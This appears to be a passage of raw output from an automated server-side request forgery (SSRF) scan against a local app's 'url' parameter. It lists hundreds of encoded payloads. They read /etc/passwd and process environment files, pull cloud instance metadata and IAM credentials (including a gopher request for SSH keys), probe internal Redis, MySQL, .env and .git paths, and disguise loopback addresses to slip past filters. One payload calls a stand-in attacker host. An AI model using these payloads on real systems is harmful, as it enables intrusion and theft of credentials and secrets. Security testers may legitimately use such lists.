`http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tutorials?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tutorials?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tutorials?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tutorials?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=0` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433` +- Testing: `http://localhost:4200/api/tutorials?url=017700000001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tutorials?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tutorials?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tutorials?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tutorials?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tutorials?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=0%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tutorials?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tutorials?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tutorials?url=0` +- Testing: `http://localhost:4200/api/tutorials?url=127.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=localhost` +- Testing: `http://localhost:4200/api/tutorials?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tutorials?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tutorials?url=7F000001` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433` +- Testing: `http://localhost:4200/api/tutorials?url=6425673729` +- Testing: `http://localhost:4200/api/tutorials?url=127001` +- Testing: `http://localhost:4200/api/tutorials?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tutorials?url=localtest.me` +- Testing: `http://localhost:4200/api/tutorials?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001` +- Testing: `http://localhost:4200/api/tutorials?url=017700000001` +- Testing: `http://localhost:4200/api/tutorials?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tutorials?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tutorials?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tutorials?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tutorials?url=2852039166` +- Testing: `http://localhost:4200/api/tutorials?url=7147006462` +- Testing: `http://localhost:4200/api/tutorials?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tutorials?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tutorials?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tutorials?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tutorials?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tutorials?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tutorials?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tutorials?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tutorials?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tutorials?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777` +- Testing: `http://localhost:4200/api/tutorials?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=instance-data` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tutorials?url=loopback` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tutorials?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tutorials?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tutorials?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: 